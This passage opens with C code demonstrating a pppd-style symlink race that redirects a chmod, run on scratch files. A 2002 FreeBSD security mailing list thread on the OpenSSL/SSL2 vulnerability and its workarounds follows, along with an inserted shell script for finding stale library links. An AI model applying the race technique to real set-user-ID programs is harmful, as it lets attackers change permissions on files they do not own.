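    int v = open(victim, O_WRONLY | O_CREAT, 0644);
    int d = open(decoy, O_WRONLY | O_CREAT, 0666);
    if (v < 0 || d < 0)
        return (mode_t)-1;
    fchmod(v, 0644);                        /* set explicitly, ignoring umask */
    fchmod(d, 0666);
    close(v);
    close(d);

    /* Attacker's setup: the "tty device" handed to pppd is a symlink that,
     * for now, points at the harmless world-writable decoy. */
    if (symlink(decoy, tty) != 0)
        return (mode_t)-1;

    /* pppd-like sequence: open the device and record its permissions. */
    int fd = open(tty, O_RDWR);
    if (fd < 0)
        return (mode_t)-1;
    struct stat st;
    if (fstat(fd, &st) != 0)
        return (mode_t)-1;
    mode_t saved = st.st_mode & 07777;      /* 0666: the decoy's mode */

    /* The attacker wins the race between open() and the later chmod():
     * the same name now points at the victim. */
    unlink(tty);
    if (symlink(victim, tty) != 0)
        return (mode_t)-1;

    /* Initialization "fails" (tcgetattr in the advisory); restore the mode. */
    if (use_fd)
        restore_mode_by_fd(fd, saved);      /* acts on the decoy's inode */
    else
        restore_mode_by_path(tty, saved);   /* follows the symlink to the victim */
    close(fd);

    struct stat vs;
    if (stat(victim, &vs) != 0)
        return (mode_t)-1;
    mode_t result = vs.st_mode & 07777;

    unlink(tty);
    unlink(decoy);
    unlink(victim);
    rmdir(dir);
    return result;
}

int main(void)
{
    printf("restore by path: victim ends up %04o (0666 means the race was won)\n",
           (unsigned)race_demo(0));
    printf("restore by fd:   victim ends up %04o (0644 means it was untouched)\n",
           (unsigned)race_demo(1));
    return 0;
}
```

Run it unprivileged: both scratch files belong to the caller, so chmod(2) succeeds either way and the path variant visibly flips the victim to 0666. In the real case pppd is set-user-ID root, which is what lets the same pattern change the mode of a file the attacker does not own; the advisory's workaround (chmod u-s) removes exactly that amplifier, and the fd-based restore removes the race itself.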
From owner-freebsd-security Wed Jul 31 9:19:24 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 40FD937B400 for ; Wed, 31 Jul 2002 09:19:22 -0700 (PDT)
Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by mx1.FreeBSD.org (Postfix) with ESMTP id 93F1343E3B for ; Wed, 31 Jul 2002 09:19:21 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu)
Received: from khavrinen.lcs.mit.edu (localhost [IPv6:::1]) by khavrinen.lcs.mit.edu (8.12.3/8.12.5) with ESMTP id g6VGJKls030520 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=OK); Wed, 31 Jul 2002 12:19:21 -0400 (EDT) (envelope-from wollman@khavrinen.lcs.mit.edu)
Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.12.3/8.12.5/Submit) id g6VGJKba030517; Wed, 31 Jul 2002 12:19:20 -0400 (EDT) (envelope-from wollman)
Date: Wed, 31 Jul 2002 12:19:20 -0400 (EDT)
From: Garrett Wollman
Message-Id: <200207311619.g6VGJKba030517@khavrinen.lcs.mit.edu>
To: Mike Tancsa
Cc: security@FreeBSD.ORG
Subject: Re: apache mod_ssl ?
In-Reply-To: <5.1.0.14.0.20020731075521.04b14d70@192.168.0.12>
References: <5.1.0.14.0.20020730231635.040ee248@192.168.0.12> <20020731085657.GA33775@fnyx.vmunix.dk> <5.1.0.14.0.20020731075521.04b14d70@192.168.0.12>

< said:

>> % strings /usr/local/libexec/apache/libssl.so | egrep "0\.9\.6"
>> OpenSSL 0.9.6a 5 Apr 2001

`ldd' will demonstrate that this string, whatever its function, does not come from the OpenSSL library. (The version of OpenSSL in FreeBSD has been 0.9.6c for quite some time.)
-GAWollman

From owner-freebsd-security Wed Jul 31 9:33: 4 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4441A37B401 for ; Wed, 31 Jul 2002 09:33:01 -0700 (PDT)
Received: from thought.holo.org (w120.z064002057.sjc-ca.dsl.cnc.net [64.2.57.120]) by mx1.FreeBSD.org (Postfix) with ESMTP id 4553D43E31 for ; Wed, 31 Jul 2002 09:33:00 -0700 (PDT) (envelope-from bwb@holo.org)
Received: from localhost (localhost [127.0.0.1]) by thought.holo.org (8.12.5/8.12.5) with ESMTP id g6VGXCFT002865; Wed, 31 Jul 2002 09:33:12 -0700 (PDT) (envelope-from bwb@holo.org)
Date: Wed, 31 Jul 2002 09:33:12 -0700 (PDT)
From: Brian Buchanan
To: Garrett Wollman
Cc: Mike Tancsa ,
Subject: Re: apache mod_ssl ?
In-Reply-To: <200207311619.g6VGJKba030517@khavrinen.lcs.mit.edu>
Message-ID: <20020731093047.J395-100000@thought.holo.org>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

On Wed, 31 Jul 2002, Garrett Wollman wrote:

> < said:
>
> >> % strings /usr/local/libexec/apache/libssl.so | egrep "0\.9\.6"
> >> OpenSSL 0.9.6a 5 Apr 2001
>
> `ldd' will demonstrate that this string, whatever its function, does
> not come from the OpenSSL library.  (The version of OpenSSL in FreeBSD
> has been 0.9.6c for quite some time.)
>

-stable hasn't been at 0.9.6c.
FreeBSD 4.6-STABLE #3: Sat Jul 27 15:04:46 PDT 2002

> openssl version
OpenSSL 0.9.6a 5 Apr 2001

From owner-freebsd-security Wed Jul 31 9:35:47 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 625BD37B401 for ; Wed, 31 Jul 2002 09:35:43 -0700 (PDT)
Received: from horsey.gshapiro.net (horsey.gshapiro.net [209.220.147.178]) by mx1.FreeBSD.org (Postfix) with ESMTP id C187143E31 for ; Wed, 31 Jul 2002 09:35:42 -0700 (PDT) (envelope-from gshapiro@gshapiro.net)
Received: from horsey.gshapiro.net (gshapiro@localhost [IPv6:::1]) by horsey.gshapiro.net (8.12.5/8.12.5) with ESMTP id g6VGZgvE042314 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO); Wed, 31 Jul 2002 09:35:42 -0700 (PDT)
Received: (from gshapiro@localhost) by horsey.gshapiro.net (8.12.5/8.12.5/Submit) id g6VGZgEP042311; Wed, 31 Jul 2002 09:35:42 -0700 (PDT)
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <15688.4573.994723.53961@horsey.gshapiro.net>
Date: Wed, 31 Jul 2002 09:35:41 -0700
From: Gregory Neil Shapiro
To: Garrett Wollman
Cc: Mike Tancsa , security@FreeBSD.ORG
Subject: Re: apache mod_ssl ?
In-Reply-To: <200207311619.g6VGJKba030517@khavrinen.lcs.mit.edu>
References: <5.1.0.14.0.20020730231635.040ee248@192.168.0.12> <20020731085657.GA33775@fnyx.vmunix.dk> <5.1.0.14.0.20020731075521.04b14d70@192.168.0.12> <200207311619.g6VGJKba030517@khavrinen.lcs.mit.edu>
X-Mailer: VM 7.03 under 21.1 (patch 14) "Cuyahoga Valley" XEmacs Lucid

>>> % strings /usr/local/libexec/apache/libssl.so | egrep "0\.9\.6"
>>> OpenSSL 0.9.6a 5 Apr 2001

wollman> `ldd' will demonstrate that this string, whatever its function, does
wollman> not come from the OpenSSL library.  (The version of OpenSSL in FreeBSD
wollman> has been 0.9.6c for quite some time.)

Not in -STABLE.  -STABLE had 0.9.6a.  -CURRENT was the only FreeBSD version with 0.9.6c.

From owner-freebsd-security Wed Jul 31 11:58:33 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D6EB337B443 for ; Wed, 31 Jul 2002 11:58:29 -0700 (PDT)
Received: from invert.com (invert.com [209.164.21.15]) by mx1.FreeBSD.org (Postfix) with ESMTP id 5202A43E5E for ; Wed, 31 Jul 2002 11:58:28 -0700 (PDT) (envelope-from mlist-freebsd@alt255.com)
Received: (from jburke@localhost) by invert.com (8.11.3/8.11.3) id g6VJ2N241456 for security@FreeBSD.ORG; Wed, 31 Jul 2002 12:02:23 -0700 (PDT) (envelope-from mlist-freebsd@alt255.com)
Date: Wed, 31 Jul 2002 12:02:23 -0700
From: Justin Burke
To: security@FreeBSD.ORG
Subject: Re: OpenSSL workaround
Message-ID: <20020731190223.GD38776@alt255.com>
Mail-Followup-To: security@FreeBSD.ORG
References: <20020731032131.GB38906@madman.nectar.cc> <0CDD655A-A472-11D6-AA2C-003065819B10@lunenburg.org>
<20020731112841.GC26274@madman.nectar.cc>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20020731112841.GC26274@madman.nectar.cc>
User-Agent: Mutt/1.4i

* Jacques A. Vidrine (nectar@FreeBSD.ORG) wrote:
> I recommend that you rebuild the system as described in
> .  Also
> rebuild third-party applications that use OpenSSL (either libssl or
> libcrypto).
>
> Any applications that are rebuilt must also be restarted.

Will the kernel need to be rebuilt?

Thanks.

From owner-freebsd-security Wed Jul 31 12: 1:29 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8DFE837B400 for ; Wed, 31 Jul 2002 12:01:27 -0700 (PDT)
Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by mx1.FreeBSD.org (Postfix) with ESMTP id 1766443E3B for ; Wed, 31 Jul 2002 12:01:27 -0700 (PDT) (envelope-from nectar@nectar.cc)
Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id 5B31854; Wed, 31 Jul 2002 14:01:26 -0500 (CDT)
Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.12.3) with ESMTP id g6VJ1QU4018007; Wed, 31 Jul 2002 14:01:26 -0500 (CDT) (envelope-from nectar@madman.nectar.cc)
Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g6VJ1NOr018006; Wed, 31 Jul 2002 14:01:23 -0500 (CDT)
Date: Wed, 31 Jul 2002 14:01:23 -0500
From: "Jacques A.
Vidrine"
To: Justin Burke
Cc: security@FreeBSD.ORG
Subject: Re: OpenSSL workaround
Message-ID: <20020731190123.GA17979@madman.nectar.cc>
References: <20020731032131.GB38906@madman.nectar.cc> <0CDD655A-A472-11D6-AA2C-003065819B10@lunenburg.org> <20020731112841.GC26274@madman.nectar.cc> <20020731190223.GD38776@alt255.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20020731190223.GD38776@alt255.com>
X-Url: http://www.nectar.cc/
User-Agent: Mutt/1.5.1i-ja.1

On Wed, Jul 31, 2002 at 12:02:23PM -0700, Justin Burke wrote:
> * Jacques A. Vidrine (nectar@FreeBSD.ORG) wrote:
> > I recommend that you rebuild the system as described in
> > .  Also
> > rebuild third-party applications that use OpenSSL (either libssl or
> > libcrypto).
> >
> > Any applications that are rebuilt must also be restarted.
>
>
> Will the kernel need to be rebuilt?

Not for this.  However, another fix went in a few moments ago that involves the kernel, so you might as well (after CVSup'ing, of course).

Cheers,
-- 
Jacques A. Vidrine                      http://www.nectar.cc/
NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos
jvidrine@verio.net . nectar@FreeBSD.org .
nectar@kth.se

From owner-freebsd-security Wed Jul 31 12:22:50 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 520C437B400 for ; Wed, 31 Jul 2002 12:22:47 -0700 (PDT)
Received: from mighty.grot.org (mighty.grot.org [204.182.56.120]) by mx1.FreeBSD.org (Postfix) with ESMTP id 09FAE43E3B for ; Wed, 31 Jul 2002 12:22:47 -0700 (PDT) (envelope-from aditya@grot.org)
Received: by mighty.grot.org (Postfix, from userid 515) id 873275D1C; Wed, 31 Jul 2002 12:22:41 -0700 (PDT)
Newsgroups: gmane.comp.apache.mod-ssl.user
Cc: freebsd-security@freebsd.org
Subject: temporary workaround for most recent openssl remote exploit?
X-Archive: encrypt
From: Aditya
Date: Wed, 31 Jul 2002 12:22:40 -0700
Message-ID:
Organization: Grot Free
Lines: 23
User-Agent: Gnus/5.090007 (Oort Gnus v0.07) XEmacs/21.4 (Common Lisp, i386--freebsd)
Cancel-Lock: sha1:tQ2z/mW695KCP8JrHT/5LK+4tQA=
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Posted-To: gmane.comp.apache.mod-ssl.user

The following message is a courtesy copy of an article that has been posted to gmane.comp.apache.mod-ssl.user as well.

The FreeBSD Security Advisory FreeBSD-SA-02:33.openssl says:

   IV. Workaround

   Disabling the SSL2 protocol in server applications should render server exploits harmless. There is no known workaround for client applications.
and while I'm upgrading my systems, to limit my window of exposure, if I restart my Apache servers with:

   SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:-SSLv2:+EXP:+eNULL

(change +SSLv2 to -SSLv2) rather than the default:

   SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL

will that be sufficient as a workaround?

Thanks,
Adi

From owner-freebsd-security Wed Jul 31 12:34:13 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id BC6FF37B400 for ; Wed, 31 Jul 2002 12:34:09 -0700 (PDT)
Received: from ady.warpnet.ro (ady.warpnet.ro [217.156.25.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 89AF143E67 for ; Wed, 31 Jul 2002 12:34:05 -0700 (PDT) (envelope-from ady@freebsd.ady.ro)
Received: from localhost (ady@localhost) by ady.warpnet.ro (8.9.3/8.9.3) with ESMTP id WAA98774; Wed, 31 Jul 2002 22:33:48 +0300 (EEST) (envelope-from ady@freebsd.ady.ro)
Date: Wed, 31 Jul 2002 22:33:48 +0300 (EEST)
From: Adrian Penisoara
X-Sender: ady@ady.warpnet.ro
To: net@wsf.at
Cc: Simon Dick , freebsd-security@FreeBSD.ORG
Subject: Re: Are OpenSSL bugs related to OpenSSH ?
In-Reply-To: <200207311127.g6VBRWY98818@www.wsf.at>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

Hi,

What is the exact problem that affects OpenSSH by means of being linked with libcrypto ? Does it use any SSL mechanisms that were reported to be vulnerable ?

PS: the (just released) FreeBSD advisory on OpenSSL vulnerabilities doesn't mention the SSH binaries as being affected by the problems.
Thank you,
Ady (@freebsd.ady.ro)
____________________________________________________________________
| An age is called Dark not because the light fails to shine, but  |
| because people refuse to see it.                                  |
|                                  -- James Michener, "Space"       |

On Wed, 31 Jul 2002 net@wsf.at wrote:

> Simon Dick schrieb:
>
> > On Wed, 2002-07-31 at 10:24, Adrian Penisoara wrote:
> > > Hi,
> > >
> > > Though I think that the recent OpenSSL buffer overflows don't imply
> > > that OpenSSH is vulnerable, could someone please confirm this ?
> >
> > OpenSSH is linked against OpenSSL, so it's a possibility that it could
> > be vulnerable, but unless you have ssh statically linked then updating
> > your openssl version will fix any problems.
> >
>
> Hi Simon,
>
> I think this is only true if your version of ssh/sshd was already
> built with a recent version of OpenSSL (libcrypto.so.3). If your
> ssh uses libcrypto.so.2, updating OpenSSL to 0.9.6e would still
> leave your ssh vulnerable (same applies to any other build using
> OpenSSL)
>
> Thomas
>
> BTW: which version of OpenSSL bumped so.2 -> so.3 ?
From owner-freebsd-security Wed Jul 31 12:50:28 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id ACF2337B400 for ; Wed, 31 Jul 2002 12:50:24 -0700 (PDT)
Received: from net2.dinoex.sub.org (net2.dinoex.de [212.184.201.182]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8EBB743E65 for ; Wed, 31 Jul 2002 12:50:22 -0700 (PDT) (envelope-from dirk.meyer@dinoex.sub.org)
Received: from net2.dinoex.sub.org (dinoex@net2.dinoex.sub.org [127.0.0.1]) by net2.dinoex.sub.org (8.12.5/8.12.5) with ESMTP id g6VJoA5H006579 for ; Wed, 31 Jul 2002 21:50:11 +0200 (CEST) (envelope-from dirk.meyer@dinoex.sub.org)
X-MDaemon-Deliver-To:
Received: from gate.dinoex.sub.org (dinoex@localhost) by net2.dinoex.sub.org (8.12.5/8.12.5/Submit) with BSMTP id g6VJoAUh006561 for ; Wed, 31 Jul 2002 21:50:10 +0200 (CEST) (envelope-from dirk.meyer@dinoex.sub.org)
To: freebsd-security@FreeBSD.ORG
Message-ID:
From: dirk.meyer@dinoex.sub.org (Dirk Meyer)
Organization: privat
Subject: Re: Are OpenSSL bugs related to OpenSSH ?
Date: Wed, 31 Jul 2002 21:43:34 +0200
X-Mailer: Dinoex 1.79
References: <1028113366.1406.0.camel@linux> <200207311127.g6VBRWY98818@www.wsf.at> <20020731151607.GD26793@madman.nectar.cc>
X-Gateway: ZCONNECT gate.dinoex.sub.org [UNIX/Connect 0.94]
X-PGP-Fingerprint: 44 16 EC 0A D3 3A 4F 28 8A 8A 47 93 F1 CF 2F 12
X-Copyright: (C) Copyright 2001 by Dirk Meyer -- All rights reserved.
X-PGP-Key-Avail: mailto:pgp-public-keys@keys.de.pgp.net Subject:GET 0x331CDA5D
X-ZC-VIA: 20020731000000S+2@dinoex.sub.org
X-Accept-Language: de,en
X-Noad: Please don't send me ad's by mail. I'm bored by this type of mail.
X-Note: sending SPAM is a violation of both german and US law and will at least trigger a complaint at your provider's postmaster.
X-No-Archive: yes Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Jacques A. Vidrine wrote: > I think the configure script is broken, and having the port library > version number artificially higher is not a great idea. :-( It is not fully configures fault, as I found now way to tell ld to link with the desired libssl.so it the nubers are equal. As the port version is newer or equal the version in the base, linking with libssl.so from the ports is desired. So if no port is installed everything compiles and links with the base version, and when the port is installed each port can link against it. The version BUMP makes this clear, even if the API is the same. Otherwise we have to hack about 200 ports to select. kind regards Dirk - Dirk Meyer, Im Grund 4, 34317 Habichtswald, Germany - [dirk.meyer@dinoex.sub.org],[dirk.meyer@guug.de],[dinoex@FreeBSD.org] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 31 13:34: 8 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id BE07037B400 for ; Wed, 31 Jul 2002 13:34:03 -0700 (PDT) Received: from spork.pantherdragon.org (spork.pantherdragon.org [206.29.168.146]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3BF3B43E5E for ; Wed, 31 Jul 2002 13:34:03 -0700 (PDT) (envelope-from dmp@pantherdragon.org) Received: from sparx.pantherdragon.org (evrtwa1-ar10-4-61-252-210.evrtwa1.dsl-verizon.net [4.61.252.210]) by spork.pantherdragon.org (Postfix) with ESMTP id 5123F471DC; Wed, 31 Jul 2002 13:34:02 -0700 (PDT) Received: from pantherdragon.org (speck.techno.pagans [172.21.42.2]) by sparx.pantherdragon.org (Postfix) with ESMTP id 81C2E10024; Tue, 30 Jul 2002 18:41:03 -0700 (PDT) Message-ID: 
<3D47402F.83B37CBA@pantherdragon.org> Date: Tue, 30 Jul 2002 18:41:03 -0700 From: Darren Pilgrim X-Mailer: Mozilla 4.76 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: gabriel_ambuehl@buz.ch Cc: Geir =?iso-8859-1?Q?R=E5ness?= , freebsd-security@freebsd.org Subject: Re: About the openssl hole References: <004001c237cf$23c00560$fa00a8c0@elixor> <170112657687.20020730181657@buz.ch> <000d01c237e5$ceede1d0$fa00a8c0@elixor> <5113861671.20020730183701@buz.ch> <002301c237ea$04b4d4f0$fa00a8c0@elixor> <2115515250.20020730190434@buz.ch> <3D470873.5C42BF65@pantherdragon.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Gabriel Ambuehl wrote: > > -----BEGIN PGP SIGNED MESSAGE----- > > Hello Geir, > > Tuesday, July 30, 2002, 6:56:12 PM, you wrote: > > > I talked with an freind of mine who tried this solution, and he told > me that it where only one patch that failed. > > If you remove the patch "patch-ah" the build will go fine. > > > But as many know, the port of openssl will not completly replace the > core openssl. > > (You could see this if you build mod_ssl) > > Well I could live without mod_ssl for the next hours, but I can't just > go shutdown ssh on all boxes cause that would mean I'd have to go > onsite to some 4 NOCs (two of them on the other side of the world) to > have SSH get backup. Hmm. Maybe I'll just shut all SSL stuff down and > have the NOC monkeys reboot them when the patch is here.... > > What's happening (I suppose) is that the port gets installed to > /usr/local/lib whereas the the old version still is in /usr/lib where Use -DOPENSSL_OVERWRITE_BASE. I recommend people install the OpenSSL port anyway, it gives you all those nifty extra programs that the maintainer(s) for the in-base openssl has seen fit not to include. 
> it belongs to as part of the base system which means that you probably
> have to overwrite the old lib by hand but I wouldn't want to guarantee
> that nothing is going to break if you do this.

I can say from personal experience that installing the openssl port with
-DOPENSSL_OVERWRITE_BASE doesn't break anything I've found or use
(openssh, mod_ssl, courier_imap, and postfix).

> To make it short: it's
> probably best to just wait and update your boxes ASAP

Why take down the whole machine, when you can use a port to just patch
the broken part? That's what was so great about the OpenSSH port, it let
a lot of people who couldn't make world or reinstall upgrade their
copies of OpenSSH.

From owner-freebsd-security Wed Jul 31 13:44:47 2002
Date: Wed, 31 Jul 2002 15:44:11 -0500
From: Christopher Schulte
To: dirk.meyer@dinoex.sub.org (Dirk Meyer), freebsd-security@FreeBSD.ORG
Subject: Re: Are OpenSSL bugs related to OpenSSH ?
At 09:43 PM 7/31/2002 +0200, Dirk Meyer wrote:
>The version BUMP makes this clear, even if the API is the same.
>Otherwise we have to hack about 200 ports to select.

I installed the 0.9.6e openssl port to overwrite base
(-DOPENSSL_OVERWRITE_BASE) and relinked my critical apps. I added:

NO_OPENSSL= true

to /etc/make.conf

Now when I want to update to a patched RELENG_4_6, and use the base
openssl, should I:

1) deinstall the port
2) remove make.conf declaration
3) cvsup/make world
4) recompile my third party apps again, because /usr/lib/libcrypto.so.3
   and /usr/lib/libssl.so.3 are not used by the base openssl

I'm only a tad confused with number 4. Was the .2 -> .3 change made just
within the port or within openssl itself? Thanks!

>kind regards Dirk
>
>- Dirk Meyer, Im Grund 4, 34317 Habichtswald, Germany
>- [dirk.meyer@dinoex.sub.org],[dirk.meyer@guug.de],[dinoex@FreeBSD.org]

--
Christopher Schulte
http://www.schulte.org/
Do not un-munge my @nospam.schulte.org email address.
This address is valid.
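The check behind Thomas's earlier point (an app still bound to libcrypto.so.2 gains nothing from a new library) and behind step 4 above (which third-party apps need relinking): list the binaries whose ldd output still resolves libcrypto/libssl to a version other than the one now installed. This is an added example, not code from the thread; it assumes ldd(1) lines of the form `libcrypto.so.2 => /usr/lib/libcrypto.so.2 (0x...)`, the variable names WANT_CRYPTO/WANT_SSL are constructed, and the sample ldd output is constructed.

```shell
#!/bin/sh
# Added example, not from the thread: report binaries whose ldd output still
# resolves libcrypto/libssl to a library version other than the expected one.
# Assumes ldd(1) lines of the form:
#   libcrypto.so.2 => /usr/lib/libcrypto.so.2 (0x28088000)

# Expected version suffixes after the upgrade (constructed variable names;
# set them from `ls /usr/lib/libcrypto.so.*` or /usr/local/lib on your box).
WANT_CRYPTO="${WANT_CRYPTO:-3}"
WANT_SSL="${WANT_SSL:-3}"

# stale_openssl_deps: read ldd-style output on stdin and print each
# libcrypto/libssl dependency whose version suffix is not the expected one.
stale_openssl_deps() {
    awk -v wc="$WANT_CRYPTO" -v ws="$WANT_SSL" '
        $1 ~ /^lib(crypto|ssl)\.so\.[0-9]+$/ {
            n = split($1, part, ".")
            name = part[1]; ver = part[n]
            if (name == "libcrypto" && ver != wc) print $1
            if (name == "libssl"    && ver != ws) print $1
        }'
}

# scan_binaries: run ldd over each given file and print "path: stale-lib ..."
# for those still bound to an old OpenSSL library. Exit status is 1 if any
# stale binding was found, so the call can gate a rebuild in a script.
scan_binaries() {
    found=0
    for f in "$@"; do
        [ -f "$f" ] || continue
        stale=$(ldd "$f" 2>/dev/null | stale_openssl_deps | tr '\n' ' ')
        if [ -n "$stale" ]; then
            printf '%s: %s\n' "$f" "$stale"
            found=1
        fi
    done
    return $found
}

# Constructed ldd output for an sshd built before OpenSSL was upgraded:
SAMPLE_OLD='/usr/sbin/sshd:
        libcrypto.so.2 => /usr/lib/libcrypto.so.2 (0x28088000)
        libutil.so.3 => /usr/lib/libutil.so.3 (0x28140000)
        libz.so.2 => /usr/lib/libz.so.2 (0x28149000)
        libc.so.4 => /usr/lib/libc.so.4 (0x28157000)'

# Constructed ldd output for a binary relinked against the port libraries:
SAMPLE_NEW='/usr/local/sbin/httpd:
        libssl.so.3 => /usr/local/lib/libssl.so.3 (0x28200000)
        libcrypto.so.3 => /usr/local/lib/libcrypto.so.3 (0x28230000)
        libc.so.4 => /usr/lib/libc.so.4 (0x28300000)'

# Typical use on a live system (no output means nothing is left to relink):
#   scan_binaries /usr/sbin/sshd /usr/local/sbin/* /usr/local/libexec/*
printf '%s\n' "$SAMPLE_OLD" | stale_openssl_deps   # prints: libcrypto.so.2
printf '%s\n' "$SAMPLE_NEW" | stale_openssl_deps   # prints nothing
```

Statically linked binaries show no libcrypto line at all, so they never appear here and must be rebuilt regardless.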

From owner-freebsd-security Wed Jul 31 13:58:07 2002
Date: Wed, 31 Jul 2002 13:58:02 -0700
From: Fred Condo
To: freebsd-security@freebsd.org
Subject: Old SSL libraries lying around

After doing a buildworld/installworld after the OpenSSL commits had
been made to cvs, I did this:

ll /usr/lib/libssl*
-r--r--r--  1 root  wheel  234530 Jul 29 14:37 /usr/lib/libssl.a
lrwxr-xr-x  1 root  wheel      11 Jul 29 14:37 /usr/lib/libssl.so -> libssl.so.2
-r--r--r--  1 root  wheel  176348 Feb 14  2001 /usr/lib/libssl.so.1
-r--r--r--  1 root  wheel  177160 Jul 29 14:37 /usr/lib/libssl.so.2
-r--r--r--  1 root  wheel  247174 Aug 24  2001 /usr/lib/libssl_p.a

Should I be concerned about the presence of the antiques from 2001?
Should I delete them?

--
Fred Condo - fred@condo.chico.ca.us
Injustice anywhere is a threat to justice everywhere.
    -- Martin Luther King, Jr.

From owner-freebsd-security Wed Jul 31 14:29:31 2002
Date: Wed, 31 Jul 2002 17:32:09 -0400 (EDT)
From: "Michael Sharp"
Subject: Re: About the openssl hole

Regarding using a port to fix a core issue. I so totally disagree.

Each port/package that is installed on a FreeBSD box degrades the
security profile in small increments.
My thoughts, use core as much as you can, and use ports sparingly. I had
4 services exposed to the net that relied on the bad OpenSSL. I chose to
wait out the core team to fix things. Yes, my website might have been
down for 8 hrs, mail as well.. etc... but so what? However, I'm not a
1000 hit a day business either so I guess one could argue the wait for
core/install a port issue there. But I have found that core typically
goes right to work on an issue, and a fix is out within hrs.

Just my 2 cents

michael

> Gabriel Ambuehl wrote:
>>
>> -----BEGIN PGP SIGNED MESSAGE-----
>>
>> Hello Geir,
>>
>> Tuesday, July 30, 2002, 6:56:12 PM, you wrote:
>>
>> > I talked with a friend of mine who tried this solution, and he told
>> > me that it was only one patch that failed.
>> > If you remove the patch "patch-ah" the build will go fine.
>>
>> > But as many know, the port of openssl will not completely replace the
>> > core openssl.
>> > (You could see this if you build mod_ssl)
>>
>> Well I could live without mod_ssl for the next hours, but I can't just
>> go shutdown ssh on all boxes cause that would mean I'd have to go
>> onsite to some 4 NOCs (two of them on the other side of the world) to
>> have SSH get back up. Hmm. Maybe I'll just shut all SSL stuff down and
>> have the NOC monkeys reboot them when the patch is here....
>>
>> What's happening (I suppose) is that the port gets installed to
>> /usr/local/lib whereas the old version still is in /usr/lib where
>
> Use -DOPENSSL_OVERWRITE_BASE. I recommend people install the OpenSSL
> port anyway, it gives you all those nifty extra programs that the
> maintainer(s) for the in-base openssl has seen fit not to include.
>
>> it belongs to as part of the base system which means that you probably
>> have to overwrite the old lib by hand but I wouldn't want to guarantee
>> that nothing is going to break if you do this.
>
> I can say from personal experience that installing the openssl port with
> -DOPENSSL_OVERWRITE_BASE doesn't break anything I've found or use
> (openssh, mod_ssl, courier_imap, and postfix).
>
>> To make it short: it's
>> probably best to just wait and update your boxes ASAP
>
> Why take down the whole machine, when you can use a port to just patch
> the broken part? That's what was so great about the OpenSSH port, it let
> a lot of people who couldn't make world or reinstall upgrade their
> copies of OpenSSH.

From owner-freebsd-security Wed Jul 31 14:40:39 2002
Date: Wed, 31 Jul 2002 14:40:33 -0700
From: Darren Pilgrim
To: Michael Sharp
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: About the openssl hole
Michael Sharp wrote:
>
> Regarding using a port to fix a core issue. I so totally disagree.
>
> Each port/package that is installed on a FreeBSD box degrades the security
> profile in small increments. My thoughts, use core as much as you can,
> and use ports sparingly. I had 4 services exposed to the net that relied
> on the bad OpenSSL. I chose to wait out the core team to fix things. Yes,
